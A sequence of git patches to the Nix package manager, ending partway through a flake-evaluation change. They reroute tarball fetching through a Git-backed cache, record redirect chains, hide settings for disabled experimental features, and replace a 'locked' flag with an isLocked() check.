We have to support this for `fetchTree { type = "file" }` (and
probably other types of trees that can have a non-directory at the
root, like NARs).
---
 src/libutil/posix-source-accessor.cc | 5 +++++
 tests/functional/fetchTree-file.sh   | 1 +
 2 files changed, 6 insertions(+)

diff --git a/src/libutil/posix-source-accessor.cc b/src/libutil/posix-source-accessor.cc
index 0300de01e..f8ec7fc6b 100644
--- a/src/libutil/posix-source-accessor.cc
+++ b/src/libutil/posix-source-accessor.cc
@@ -30,6 +30,11 @@ std::filesystem::path PosixSourceAccessor::makeAbsPath(const CanonPath & path)
 {
     return root.empty()
         ? (std::filesystem::path { path.abs() })
+        : path.isRoot()
+        ? /* Don't append a slash for the root of the accessor, since
+             it can be a non-directory (e.g. in the case of `fetchTree
+             { type = "file" }`). */
+          root
         : root / path.rel();
 }
 
diff --git a/tests/functional/fetchTree-file.sh b/tests/functional/fetchTree-file.sh
index 6395c133d..be698ea35 100644
--- a/tests/functional/fetchTree-file.sh
+++ b/tests/functional/fetchTree-file.sh
@@ -14,6 +14,7 @@ test_fetch_file () {
         tree = builtins.fetchTree { type = "file"; url = "file://$PWD/test_input"; };
     in
     assert (tree.narHash == "$input_hash");
+    assert builtins.readFile tree == "foo\n";
     tree
 EOF
 }

From cabee9815239af426cece729cb765810b8a716ce Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Tue, 20 Feb 2024 12:57:36 +0100
Subject: [PATCH 489/654] Tarball fetcher: Use the content-addressed Git cache

Backported from the lazy-trees branch.
---
 src/libcmd/common-eval-args.cc   |   6 +-
 src/libexpr/eval.cc              |   7 +-
 src/libexpr/primops/fetchTree.cc |   3 +-
 src/libfetchers/git-utils.cc     |  16 +++
 src/libfetchers/git-utils.hh     |   6 ++
 src/libfetchers/tarball.cc       | 168 ++++++++++++++++++-------------
 src/libfetchers/tarball.hh       |  12 ++-
 src/libstore/filetransfer.cc     |  29 ++++--
 src/libstore/filetransfer.hh     |  33 +++++-
 9 files changed, 185 insertions(+), 95 deletions(-)

diff --git a/src/libcmd/common-eval-args.cc b/src/libcmd/common-eval-args.cc
index 58f04e225..444ff81c9 100644
--- a/src/libcmd/common-eval-args.cc
+++ b/src/libcmd/common-eval-args.cc
@@ -9,6 +9,7 @@
 #include "store-api.hh"
 #include "command.hh"
 #include "tarball.hh"
+#include "fetch-to-store.hh"
 
 namespace nix {
 
@@ -167,8 +168,9 @@ Bindings * MixEvalArgs::getAutoArgs(EvalState & state)
 SourcePath lookupFileArg(EvalState & state, std::string_view s, const Path * baseDir)
 {
     if (EvalSettings::isPseudoUrl(s)) {
-        auto storePath = fetchers::downloadTarball(
-            state.store, EvalSettings::resolvePseudoUrl(s), "source", false).storePath;
+        auto accessor = fetchers::downloadTarball(
+            EvalSettings::resolvePseudoUrl(s)).accessor;
+        auto storePath = fetchToStore(*state.store, SourcePath(accessor), FetchMode::Copy);
         return state.rootPath(CanonPath(state.store->toRealPath(storePath)));
     }
 
diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc
index 4919ac358..133d02f59 100644
--- a/src/libexpr/eval.cc
+++ b/src/libexpr/eval.cc
@@ -2794,10 +2794,11 @@ std::optional EvalState::resolveSearchPathPath(const SearchPath::Pa
 
     if (EvalSettings::isPseudoUrl(value)) {
         try {
-            auto storePath = fetchers::downloadTarball(
-                store, EvalSettings::resolvePseudoUrl(value), "source", false).storePath;
+            auto accessor = fetchers::downloadTarball(
+                EvalSettings::resolvePseudoUrl(value)).accessor;
+            auto storePath = fetchToStore(*store, SourcePath(accessor), FetchMode::Copy);
             res = { store->toRealPath(storePath) };
-        } catch (FileTransferError & e) {
+        } catch (Error & e) {
             logWarning({
                 .msg = HintFmt("Nix search path entry '%1%' cannot be downloaded, ignoring", value)
             });
diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc
index 1997d5513..01a43e3fd 100644
--- a/src/libexpr/primops/fetchTree.cc
+++ b/src/libexpr/primops/fetchTree.cc
@@ -9,6 +9,7 @@
 #include "tarball.hh"
 #include "url.hh"
 #include "value-to-json.hh"
+#include "fetch-to-store.hh"
 
 #include 
 #include 
@@ -473,7 +474,7 @@ static void fetch(EvalState & state, const PosIdx pos, Value * * args, Value & v
     //       https://github.com/NixOS/nix/issues/4313
     auto storePath =
         unpack
-        ? fetchers::downloadTarball(state.store, *url, name, (bool) expectedHash).storePath
+        ? fetchToStore(*state.store, fetchers::downloadTarball(*url).accessor, FetchMode::Copy, name)
         : fetchers::downloadFile(state.store, *url, name, (bool) expectedHash).storePath;
 
     if (expectedHash) {
diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc
index 4f034e9d4..f216b6e10 100644
--- a/src/libfetchers/git-utils.cc
+++ b/src/libfetchers/git-utils.cc
@@ -466,6 +466,22 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this
         else
             throw Error("Commit signature verification on commit %s failed: %s", rev.gitRev(), output);
     }
+
+    Hash treeHashToNarHash(const Hash & treeHash) override
+    {
+        auto accessor = getAccessor(treeHash, false);
+
+        fetchers::Attrs cacheKey({{"_what", "treeHashToNarHash"}, {"treeHash", treeHash.gitRev()}});
+
+        if (auto res = fetchers::getCache()->lookup(cacheKey))
+            return Hash::parseAny(fetchers::getStrAttr(*res, "narHash"), HashAlgorithm::SHA256);
+
+        auto narHash = accessor->hashPath(CanonPath::root);
+
+        fetchers::getCache()->upsert(cacheKey, fetchers::Attrs({{"narHash", narHash.to_string(HashFormat::SRI, true)}}));
+
+        return narHash;
+    }
 };
 
 ref GitRepo::openRepo(const std::filesystem::path & path, bool create, bool bare)
diff --git a/src/libfetchers/git-utils.hh b/src/libfetchers/git-utils.hh
index 5f68d26a7..fbb2d947b 100644
--- a/src/libfetchers/git-utils.hh
+++ b/src/libfetchers/git-utils.hh
@@ -93,6 +93,12 @@ struct GitRepo
     virtual void verifyCommit(
         const Hash & rev,
         const std::vector & publicKeys) = 0;
+
+    /**
+     * Given a Git tree hash, compute the hash of its NAR
+     * serialisation. This is memoised on-disk.
+     */
+    virtual Hash treeHashToNarHash(const Hash & treeHash) = 0;
 };
 
 ref getTarballCache();
diff --git a/src/libfetchers/tarball.cc b/src/libfetchers/tarball.cc
index 3b7709440..e3b1fbe56 100644
--- a/src/libfetchers/tarball.cc
+++ b/src/libfetchers/tarball.cc
@@ -9,6 +9,9 @@
 #include "types.hh"
 #include "split.hh"
 #include "posix-source-accessor.hh"
+#include "fs-input-accessor.hh"
+#include "store-api.hh"
+#include "git-utils.hh"
 
 namespace nix::fetchers {
 
@@ -57,10 +60,8 @@ DownloadFileResult downloadFile(
             throw;
     }
 
-    // FIXME: write to temporary file.
     Attrs infoAttrs({
         {"etag", res.etag},
-        {"url", res.effectiveUri},
     });
 
     if (res.immutableUrl)
@@ -91,96 +92,98 @@ DownloadFileResult downloadFile(
         storePath = std::move(info.path);
     }
 
-    getCache()->add(
-        *store,
-        inAttrs,
-        infoAttrs,
-        *storePath,
-        locked);
-
-    if (url != res.effectiveUri)
+    /* Cache metadata for all URLs in the redirect chain. */
+    for (auto & url : res.urls) {
+        inAttrs.insert_or_assign("url", url);
+        infoAttrs.insert_or_assign("url", *res.urls.rbegin());
         getCache()->add(
             *store,
-            {
-                {"type", "file"},
-                {"url", res.effectiveUri},
-                {"name", name},
-            },
+            inAttrs,
             infoAttrs,
             *storePath,
             locked);
+    }
 
     return {
         .storePath = std::move(*storePath),
         .etag = res.etag,
-        .effectiveUrl = res.effectiveUri,
+        .effectiveUrl = *res.urls.rbegin(),
         .immutableUrl = res.immutableUrl,
     };
 }
 
 DownloadTarballResult downloadTarball(
-    ref store,
     const std::string & url,
-    const std::string & name,
-    bool locked,
     const Headers & headers)
 {
     Attrs inAttrs({
-        {"type", "tarball"},
+        {"_what", "tarballCache"},
         {"url", url},
-        {"name", name},
     });
 
-    auto cached = getCache()->lookupExpired(*store, inAttrs);
+    auto cached = getCache()->lookupExpired(inAttrs);
+
+    auto attrsToResult = [&](const Attrs & infoAttrs)
+    {
+        auto treeHash = getRevAttr(infoAttrs, "treeHash");
+        return DownloadTarballResult {
+            .treeHash = treeHash,
+            .lastModified = (time_t) getIntAttr(infoAttrs, "lastModified"),
+            .immutableUrl = maybeGetStrAttr(infoAttrs, "immutableUrl"),
+            .accessor = getTarballCache()->getAccessor(treeHash, false),
+        };
+    };
+
+    if (cached && !getTarballCache()->hasObject(getRevAttr(cached->infoAttrs, "treeHash")))
+        cached.reset();
 
     if (cached && !cached->expired)
-        return {
-            .storePath = std::move(cached->storePath),
-            .lastModified = (time_t) getIntAttr(cached->infoAttrs, "lastModified"),
-            .immutableUrl = maybeGetStrAttr(cached->infoAttrs, "immutableUrl"),
-        };
+        return attrsToResult(cached->infoAttrs);
 
-    auto res = downloadFile(store, url, name, locked, headers);
+    auto _res = std::make_shared>();
 
-    std::optional unpackedStorePath;
-    time_t lastModified;
-
-    if (cached && res.etag != "" && getStrAttr(cached->infoAttrs, "etag") == res.etag) {
-        unpackedStorePath = std::move(cached->storePath);
-        lastModified = getIntAttr(cached->infoAttrs, "lastModified");
-    } else {
-        Path tmpDir = createTempDir();
-        AutoDelete autoDelete(tmpDir, true);
-        unpackTarfile(store->toRealPath(res.storePath), tmpDir);
-        auto members = readDirectory(tmpDir);
-        if (members.size() != 1)
-            throw nix::Error("tarball '%s' contains an unexpected number of top-level files", url);
-        auto topDir = tmpDir + "/" + members.begin()->name;
-        lastModified = lstat(topDir).st_mtime;
-        PosixSourceAccessor accessor;
-        unpackedStorePath = store->addToStore(name, accessor, CanonPath { topDir }, FileIngestionMethod::Recursive, HashAlgorithm::SHA256, {}, defaultPathFilter, NoRepair);
-    }
-
-    Attrs infoAttrs({
-        {"lastModified", uint64_t(lastModified)},
-        {"etag", res.etag},
+    auto source = sinkToSource([&](Sink & sink) {
+        FileTransferRequest req(url);
+        req.expectedETag = cached ? getStrAttr(cached->infoAttrs, "etag") : "";
+        getFileTransfer()->download(std::move(req), sink,
+            [_res](FileTransferResult r)
+            {
+                *_res->lock() = r;
+            });
     });
 
-    if (res.immutableUrl)
-        infoAttrs.emplace("immutableUrl", *res.immutableUrl);
+    // TODO: fall back to cached value if download fails.
 
-    getCache()->add(
-        *store,
-        inAttrs,
-        infoAttrs,
-        *unpackedStorePath,
-        locked);
+    /* Note: if the download is cached, `importTarball()` will receive
+       no data, which causes it to import an empty tarball. */
+    TarArchive archive { *source };
+    auto parseSink = getTarballCache()->getFileSystemObjectSink();
+    auto lastModified = unpackTarfileToSink(archive, *parseSink);
 
-    return {
-        .storePath = std::move(*unpackedStorePath),
-        .lastModified = lastModified,
-        .immutableUrl = res.immutableUrl,
-    };
+    auto res(_res->lock());
+
+    Attrs infoAttrs;
+
+    if (res->cached) {
+        infoAttrs = cached->infoAttrs;
+    } else {
+        infoAttrs.insert_or_assign("etag", res->etag);
+        infoAttrs.insert_or_assign("treeHash", parseSink->sync().gitRev());
+        infoAttrs.insert_or_assign("lastModified", uint64_t(lastModified));
+        if (res->immutableUrl)
+            infoAttrs.insert_or_assign("immutableUrl", *res->immutableUrl);
+    }
+
+    /* Insert a cache entry for every URL in the redirect chain. */
+    for (auto & url : res->urls) {
+        inAttrs.insert_or_assign("url", url);
+        getCache()->upsert(inAttrs, infoAttrs);
+    }
+
+    // FIXME: add a cache entry for immutableUrl? That could allow
+    // cache poisoning.
+
+    return attrsToResult(infoAttrs);
 }
 
 // An input scheme corresponding to a curl-downloadable resource.
@@ -198,6 +201,8 @@ struct CurlInputScheme : InputScheme
 
     virtual bool isValidURL(const ParsedURL & url, bool requireTree) const = 0;
 
+    static const std::set specialParams;
+
     std::optional inputFromURL(const ParsedURL & _url, bool requireTree) const override
     {
         if (!isValidURL(_url, requireTree))
@@ -220,8 +225,12 @@ struct CurlInputScheme : InputScheme
             if (auto n = string2Int(*i))
                 input.attrs.insert_or_assign("revCount", *n);
 
-        url.query.erase("rev");
-        url.query.erase("revCount");
+        if (auto i = get(url.query, "lastModified"))
+            if (auto n = string2Int(*i))
+                input.attrs.insert_or_assign("lastModified", *n);
+
+        for (auto & param : allowedAttrs())
+            url.query.erase(param);
 
         input.attrs.insert_or_assign("type", std::string { schemeName() });
         input.attrs.insert_or_assign("url", url.to_string());
@@ -275,10 +284,20 @@ struct FileInputScheme : CurlInputScheme
                 : (!requireTree && !hasTarballExtension(url.path)));
     }
 
-    std::pair fetch(ref store, const Input & input) override
+    std::pair, Input> getAccessor(ref store, const Input & _input) const override
     {
+        auto input(_input);
+
         auto file = downloadFile(store, getStrAttr(input.attrs, "url"), input.getName(), false);
-        return {std::move(file.storePath), input};
+
+        auto narHash = store->queryPathInfo(file.storePath)->narHash;
+        input.attrs.insert_or_assign("narHash", narHash.to_string(HashFormat::SRI, true));
+
+        auto accessor = makeStorePathAccessor(store, file.storePath);
+
+        accessor->setPathDisplay("«" + input.to_string() + "»");
+
+        return {accessor, input};
     }
 };
 
@@ -296,11 +315,13 @@ struct TarballInputScheme : CurlInputScheme
                 : (requireTree || hasTarballExtension(url.path)));
     }
 
-    std::pair fetch(ref store, const Input & _input) override
+    std::pair, Input> getAccessor(ref store, const Input & _input) const override
     {
-        Input input(_input);
-        auto url = getStrAttr(input.attrs, "url");
-        auto result = downloadTarball(store, url, input.getName(), false);
+        auto input(_input);
+
+        auto result = downloadTarball(getStrAttr(input.attrs, "url"), {});
+
+        result.accessor->setPathDisplay("«" + input.to_string() + "»");
 
         if (result.immutableUrl) {
             auto immutableInput = Input::fromURL(*result.immutableUrl);
@@ -314,7 +335,10 @@ struct TarballInputScheme : CurlInputScheme
         if (result.lastModified && !input.attrs.contains("lastModified"))
             input.attrs.insert_or_assign("lastModified", uint64_t(result.lastModified));
 
-        return {result.storePath, std::move(input)};
+        input.attrs.insert_or_assign("narHash",
+            getTarballCache()->treeHashToNarHash(result.treeHash).to_string(HashFormat::SRI, true));
+
+        return {result.accessor, input};
     }
 };
 
diff --git a/src/libfetchers/tarball.hh b/src/libfetchers/tarball.hh
index 9e6b50b31..77ad3bf09 100644
--- a/src/libfetchers/tarball.hh
+++ b/src/libfetchers/tarball.hh
@@ -2,11 +2,13 @@
 
 #include "types.hh"
 #include "path.hh"
+#include "hash.hh"
 
 #include 
 
 namespace nix {
 class Store;
+struct InputAccessor;
 }
 
 namespace nix::fetchers {
@@ -28,16 +30,18 @@ DownloadFileResult downloadFile(
 
 struct DownloadTarballResult
 {
-    StorePath storePath;
+    Hash treeHash;
     time_t lastModified;
     std::optional immutableUrl;
+    ref accessor;
 };
 
+/**
+ * Download and import a tarball into the Git cache. The result is the
+ * Git tree hash of the root directory.
+ */
 DownloadTarballResult downloadTarball(
-    ref store,
     const std::string & url,
-    const std::string & name,
-    bool locked,
     const Headers & headers = {});
 
 }
diff --git a/src/libstore/filetransfer.cc b/src/libstore/filetransfer.cc
index ebfae346f..bab21bf51 100644
--- a/src/libstore/filetransfer.cc
+++ b/src/libstore/filetransfer.cc
@@ -106,6 +106,8 @@ struct curlFileTransfer : public FileTransfer
                     this->result.data.append(data);
               })
         {
+            result.urls.push_back(request.uri);
+
             requestHeaders = curl_slist_append(requestHeaders, "Accept-Encoding: zstd, br, gzip, deflate, bzip2, xz");
             if (!request.expectedETag.empty())
                 requestHeaders = curl_slist_append(requestHeaders, ("If-None-Match: " + request.expectedETag).c_str());
@@ -182,6 +184,14 @@ struct curlFileTransfer : public FileTransfer
             return ((TransferItem *) userp)->writeCallback(contents, size, nmemb);
         }
 
+        void appendCurrentUrl()
+        {
+            char * effectiveUriCStr = nullptr;
+            curl_easy_getinfo(req, CURLINFO_EFFECTIVE_URL, &effectiveUriCStr);
+            if (effectiveUriCStr && *result.urls.rbegin() != effectiveUriCStr)
+                result.urls.push_back(effectiveUriCStr);
+        }
+
         size_t headerCallback(void * contents, size_t size, size_t nmemb)
         {
             size_t realSize = size * nmemb;
@@ -196,6 +206,7 @@ struct curlFileTransfer : public FileTransfer
                 statusMsg = trim(match.str(1));
                 acceptRanges = false;
                 encoding = "";
+                appendCurrentUrl();
             } else {
 
                 auto i = line.find(':');
@@ -360,14 +371,11 @@ struct curlFileTransfer : public FileTransfer
         {
             auto httpStatus = getHTTPStatus();
 
-            char * effectiveUriCStr = nullptr;
-            curl_easy_getinfo(req, CURLINFO_EFFECTIVE_URL, &effectiveUriCStr);
-            if (effectiveUriCStr)
-                result.effectiveUri = effectiveUriCStr;
-
             debug("finished %s of '%s'; curl status = %d, HTTP status = %d, body = %d bytes",
                 request.verb(), request.uri, code, httpStatus, result.bodySize);
 
+            appendCurrentUrl();
+
             if (decompressionSink) {
                 try {
                     decompressionSink->finish();
@@ -779,7 +787,10 @@ FileTransferResult FileTransfer::upload(const FileTransferRequest & request)
     return enqueueFileTransfer(request).get();
 }
 
-void FileTransfer::download(FileTransferRequest && request, Sink & sink)
+void FileTransfer::download(
+    FileTransferRequest && request,
+    Sink & sink,
+    std::function resultCallback)
 {
     /* Note: we can't call 'sink' via request.dataCallback, because
        that would cause the sink to execute on the fileTransfer
@@ -829,11 +840,13 @@ void FileTransfer::download(FileTransferRequest && request, Sink & sink)
     };
 
     enqueueFileTransfer(request,
-        {[_state](std::future fut) {
+        {[_state, resultCallback{std::move(resultCallback)}](std::future fut) {
             auto state(_state->lock());
             state->quit = true;
             try {
-                fut.get();
+                auto res = fut.get();
+                if (resultCallback)
+                    resultCallback(std::move(res));
             } catch (...) {
                 state->exc = std::current_exception();
             }
diff --git a/src/libstore/filetransfer.hh b/src/libstore/filetransfer.hh
index a3b0dde1f..1c271cbec 100644
--- a/src/libstore/filetransfer.hh
+++ b/src/libstore/filetransfer.hh
@@ -75,14 +75,34 @@ struct FileTransferRequest
 
 struct FileTransferResult
 {
+    /**
+     * Whether this is a cache hit (i.e. the ETag supplied in the
+     * request is still valid). If so, `data` is empty.
+     */
     bool cached = false;
+
+    /**
+     * The ETag of the object.
+     */
     std::string etag;
-    std::string effectiveUri;
+
+    /**
+     * All URLs visited in the redirect chain.
+     */
+    std::vector urls;
+
+    /**
+     * The response body.
+     */
     std::string data;
+
     uint64_t bodySize = 0;
-    /* An "immutable" URL for this resource (i.e. one whose contents
-       will never change), as returned by the `Link: ;
-       rel="immutable"` header. */
+
+    /**
+     * An "immutable" URL for this resource (i.e. one whose contents
+     * will never change), as returned by the `Link: ;
+     * rel="immutable"` header.
+     */
     std::optional immutableUrl;
 };
 
@@ -116,7 +136,10 @@ struct FileTransfer
      * Download a file, writing its data to a sink. The sink will be
      * invoked on the thread of the caller.
      */
-    void download(FileTransferRequest && request, Sink & sink);
+    void download(
+        FileTransferRequest && request,
+        Sink & sink,
+        std::function resultCallback = {});
 
     enum Error { NotFound, Forbidden, Misc, Transient, Interrupted };
 };

From 0acd783190418af514b363685e010195ea7260bc Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Tue, 20 Feb 2024 15:22:15 +0100
Subject: [PATCH 490/654] Don't send settings that depend on disabled
 experimental features to the daemon

This fixes warnings like

   warning: Ignoring setting 'auto-allocate-uids' because experimental feature 'auto-allocate-uids' is not enabled
   warning: Ignoring setting 'impure-env' because experimental feature 'configurable-impure-env' is not enabled

when using the daemon and the user didn't actually set those settings.

Note: this also hides those settings from `nix config show`, but that
seems a good thing.
---
 src/libutil/config-impl.hh                |  2 +-
 src/libutil/config.cc                     |  4 +++-
 tests/functional/experimental-features.sh | 10 ++++++----
 3 files changed, 10 insertions(+), 6 deletions(-)

diff --git a/src/libutil/config-impl.hh b/src/libutil/config-impl.hh
index 9f69e8444..1da0cb638 100644
--- a/src/libutil/config-impl.hh
+++ b/src/libutil/config-impl.hh
@@ -4,7 +4,7 @@
  *
  * Template implementations (as opposed to mere declarations).
  *
- * This file is an exmample of the "impl.hh" pattern. See the
+ * This file is an example of the "impl.hh" pattern. See the
  * contributing guide.
  *
  * One only needs to include this when one is declaring a
diff --git a/src/libutil/config.cc b/src/libutil/config.cc
index 37f5b50c7..617c2ec89 100644
--- a/src/libutil/config.cc
+++ b/src/libutil/config.cc
@@ -84,7 +84,9 @@ void AbstractConfig::reapplyUnknownSettings()
 void Config::getSettings(std::map & res, bool overriddenOnly)
 {
     for (const auto & opt : _settings)
-        if (!opt.second.isAlias && (!overriddenOnly || opt.second.setting->overridden))
+        if (!opt.second.isAlias
+            && (!overriddenOnly || opt.second.setting->overridden)
+            && experimentalFeatureSettings.isEnabled(opt.second.setting->experimentalFeature))
             res.emplace(opt.first, SettingInfo{opt.second.setting->to_string(), opt.second.setting->description});
 }
 
diff --git a/tests/functional/experimental-features.sh b/tests/functional/experimental-features.sh
index 9ee4a53d4..12112b293 100644
--- a/tests/functional/experimental-features.sh
+++ b/tests/functional/experimental-features.sh
@@ -31,17 +31,19 @@ source common.sh
 NIX_CONFIG='
   experimental-features = nix-command
   accept-flake-config = true
-' nix config show accept-flake-config 1>$TEST_ROOT/stdout 2>$TEST_ROOT/stderr
-grepQuiet "false" $TEST_ROOT/stdout
+' expect 1 nix config show accept-flake-config 1>$TEST_ROOT/stdout 2>$TEST_ROOT/stderr
+[[ $(cat $TEST_ROOT/stdout) = '' ]]
 grepQuiet "Ignoring setting 'accept-flake-config' because experimental feature 'flakes' is not enabled" $TEST_ROOT/stderr
+grepQuiet "error: could not find setting 'accept-flake-config'" $TEST_ROOT/stderr
 
 # 'flakes' experimental-feature is disabled after, ignore and warn
 NIX_CONFIG='
   accept-flake-config = true
   experimental-features = nix-command
-' nix config show accept-flake-config 1>$TEST_ROOT/stdout 2>$TEST_ROOT/stderr
-grepQuiet "false" $TEST_ROOT/stdout
+' expect 1 nix config show accept-flake-config 1>$TEST_ROOT/stdout 2>$TEST_ROOT/stderr
+[[ $(cat $TEST_ROOT/stdout) = '' ]]
 grepQuiet "Ignoring setting 'accept-flake-config' because experimental feature 'flakes' is not enabled" $TEST_ROOT/stderr
+grepQuiet "error: could not find setting 'accept-flake-config'" $TEST_ROOT/stderr
 
 # 'flakes' experimental-feature is enabled before, process
 NIX_CONFIG='

From 071dd2b3a4e6c0b2106f1b6f14ec26e153d97446 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Fri, 16 Feb 2024 17:00:07 +0100
Subject: [PATCH 491/654] Input: Replace 'locked' bool by isLocked() method

It's better to just check whether the input has all the attributes
needed to consider itself locked (e.g. whether a Git input has a
'rev' attribute).

Also, the 'locked' field was actually incorrect for Git inputs: it
would be set to true even for dirty worktrees. As a result, we got
away with using fetchTree() internally even though fetchTree()
requires a locked input in pure mode. In particular, this allowed
'--override-input' to work by accident.

The fix is to pass a set of "overrides" to call-flake.nix for all the
unlocked inputs (i.e. the top-level flake and any --override-inputs).
---
 src/libexpr/flake/call-flake.nix | 61 ++++++++++++++---------
 src/libexpr/flake/flake.cc       | 84 ++++++++++++++++++++------------
 src/libexpr/flake/flake.hh       |  7 +++
 src/libexpr/flake/lockfile.cc    | 17 ++++---
 src/libexpr/flake/lockfile.hh    |  7 +--
 src/libexpr/primops/fetchTree.cc |  6 +--
 src/libfetchers/fetchers.cc      | 11 ++---
 src/libfetchers/fetchers.hh      | 12 +++--
 src/libfetchers/git.cc           |  7 ++-
 src/libfetchers/github.cc        |  5 ++
 src/libfetchers/mercurial.cc     |  5 ++
 src/libfetchers/path.cc          |  5 ++
 src/libfetchers/tarball.cc       |  5 ++
 src/nix-env/nix-env.cc           |  2 +-
 src/nix/flake.cc                 |  2 +-
 tests/functional/fetchGit.sh     |  4 +-
 16 files changed, 155 insertions(+), 85 deletions(-)

diff --git a/src/libexpr/flake/call-flake.nix b/src/libexpr/flake/call-flake.nix
index 4beb0b0fe..d0ccb1e37 100644
--- a/src/libexpr/flake/call-flake.nix
+++ b/src/libexpr/flake/call-flake.nix
@@ -1,20 +1,52 @@
-lockFileStr: rootSrc: rootSubdir:
+# This is a helper to callFlake() to lazily fetch flake inputs.
+
+# The contents of the lock file, in JSON format.
+lockFileStr:
+
+# A mapping of lock file node IDs to { sourceInfo, subdir } attrsets,
+# with sourceInfo.outPath providing an InputAccessor to a previously
+# fetched tree. This is necessary for possibly unlocked inputs, in
+# particular the root input, but also --override-inputs pointing to
+# unlocked trees.
+overrides:
 
 let
 
   lockFile = builtins.fromJSON lockFileStr;
 
+  # Resolve a input spec into a node name. An input spec is
+  # either a node name, or a 'follows' path from the root
+  # node.
+  resolveInput = inputSpec:
+    if builtins.isList inputSpec
+    then getInputByPath lockFile.root inputSpec
+    else inputSpec;
+
+  # Follow an input path (e.g. ["dwarffs" "nixpkgs"]) from the
+  # root node, returning the final node.
+  getInputByPath = nodeName: path:
+    if path == []
+    then nodeName
+    else
+      getInputByPath
+        # Since this could be a 'follows' input, call resolveInput.
+        (resolveInput lockFile.nodes.${nodeName}.inputs.${builtins.head path})
+        (builtins.tail path);
+
   allNodes =
     builtins.mapAttrs
       (key: node:
         let
 
           sourceInfo =
-            if key == lockFile.root
-            then rootSrc
-            else fetchTree (node.info or {} // removeAttrs node.locked ["dir"]);
+            if overrides ? ${key}
+            then
+              overrides.${key}.sourceInfo
+            else
+              # FIXME: remove obsolete node.info.
+              fetchTree (node.info or {} // removeAttrs node.locked ["dir"]);
 
-          subdir = if key == lockFile.root then rootSubdir else node.locked.dir or "";
+          subdir = overrides.${key}.dir or node.locked.dir or "";
 
           outPath = sourceInfo + ((if subdir == "" then "" else "/") + subdir);
 
@@ -24,25 +56,6 @@ let
             (inputName: inputSpec: allNodes.${resolveInput inputSpec})
             (node.inputs or {});
 
-          # Resolve a input spec into a node name. An input spec is
-          # either a node name, or a 'follows' path from the root
-          # node.
-          resolveInput = inputSpec:
-              if builtins.isList inputSpec
-              then getInputByPath lockFile.root inputSpec
-              else inputSpec;
-
-          # Follow an input path (e.g. ["dwarffs" "nixpkgs"]) from the
-          # root node, returning the final node.
-          getInputByPath = nodeName: path:
-            if path == []
-            then nodeName
-            else
-              getInputByPath
-                # Since this could be a 'follows' input, call resolveInput.
-                (resolveInput lockFile.nodes.${nodeName}.inputs.${builtins.head path})
-                (builtins.tail path);
-
           outputs = flake.outputs (inputs // { self = result; });
 
           result =
diff --git a/src/libexpr/flake/flake.cc b/src/libexpr/flake/flake.cc
index 451780c89..022d39cdb 100644
--- a/src/libexpr/flake/flake.cc
+++ b/src/libexpr/flake/flake.cc
@@ -365,6 +365,7 @@ LockedFlake lockFlake(
         std::map overrides;
         std::set explicitCliOverrides;
         std::set overridesUsed, updatesUsed;
+        std::map, StorePath> nodePaths;
 
         for (auto & i : lockFlags.inputOverrides) {
             overrides.insert_or_assign(i.first, FlakeInput { .ref = i.second });
@@ -535,11 +536,13 @@ LockedFlake lockFlake(
                             }
                         }
 
-                        computeLocks(
-                            mustRefetch
-                            ? getFlake(state, oldLock->lockedRef, false, flakeCache, inputPath).inputs
-                            : fakeInputs,
-                            childNode, inputPath, oldLock, lockRootPath, parentPath, !mustRefetch);
+                        if (mustRefetch) {
+                            auto inputFlake = getFlake(state, oldLock->lockedRef, false, flakeCache, inputPath);
+                            nodePaths.emplace(childNode, inputFlake.storePath);
+                            computeLocks(inputFlake.inputs, childNode, inputPath, oldLock, lockRootPath, parentPath, false);
+                        } else {
+                            computeLocks(fakeInputs, childNode, inputPath, oldLock, lockRootPath, parentPath, true);
+                        }
 
                     } else {
                         /* We need to create a new lock file entry. So fetch
@@ -584,6 +587,7 @@ LockedFlake lockFlake(
                                flake. Also, unless we already have this flake
                                in the top-level lock file, use this flake's
                                own lock file. */
+                            nodePaths.emplace(childNode, inputFlake.storePath);
                             computeLocks(
                                 inputFlake.inputs, childNode, inputPath,
                                 oldLock
@@ -596,11 +600,13 @@ LockedFlake lockFlake(
                         }
 
                         else {
-                            auto [sourceInfo, resolvedRef, lockedRef] = fetchOrSubstituteTree(
+                            auto [storePath, resolvedRef, lockedRef] = fetchOrSubstituteTree(
                                 state, *input.ref, useRegistries, flakeCache);
 
                             auto childNode = make_ref(lockedRef, ref, false);
 
+                            nodePaths.emplace(childNode, storePath);
+
                             node->inputs.insert_or_assign(id, childNode);
                         }
                     }
@@ -615,6 +621,8 @@ LockedFlake lockFlake(
         // Bring in the current ref for relative path resolution if we have it
         auto parentPath = canonPath(state.store->toRealPath(flake.storePath) + "/" + flake.lockedRef.subdir, true);
 
+        nodePaths.emplace(newLockFile.root, flake.storePath);
+
         computeLocks(
             flake.inputs,
             newLockFile.root,
@@ -707,14 +715,6 @@ LockedFlake lockFlake(
                             flake.lockedRef.input.getRev() &&
                             prevLockedRef.input.getRev() != flake.lockedRef.input.getRev())
                             warn("committed new revision '%s'", flake.lockedRef.input.getRev()->gitRev());
-
-                        /* Make sure that we picked up the change,
-                           i.e. the tree should usually be dirty
-                           now. Corner case: we could have reverted from a
-                           dirty to a clean tree! */
-                        if (flake.lockedRef.input == prevLockedRef.input
-                            && !flake.lockedRef.input.isLocked())
-                            throw Error("'%s' did not change after I updated its 'flake.lock' file; is 'flake.lock' under version control?", flake.originalRef);
                     }
                 } else
                     throw Error("cannot write modified lock file of flake '%s' (use '--no-write-lock-file' to ignore)", topRef);
@@ -724,7 +724,11 @@ LockedFlake lockFlake(
             }
         }
 
-        return LockedFlake { .flake = std::move(flake), .lockFile = std::move(newLockFile) };
+        return LockedFlake {
+            .flake = std::move(flake),
+            .lockFile = std::move(newLockFile),
+            .nodePaths = std::move(nodePaths)
+        };
 
     } catch (Error & e) {
         e.addTrace({}, "while updating the lock file of flake '%s'", flake.lockedRef.to_string());
@@ -736,30 +740,48 @@ void callFlake(EvalState & state,
     const LockedFlake & lockedFlake,
     Value & vRes)
 {
-    auto vLocks = state.allocValue();
-    auto vRootSrc = state.allocValue();
-    auto vRootSubdir = state.allocValue();
-    auto vTmp1 = state.allocValue();
-    auto vTmp2 = state.allocValue();
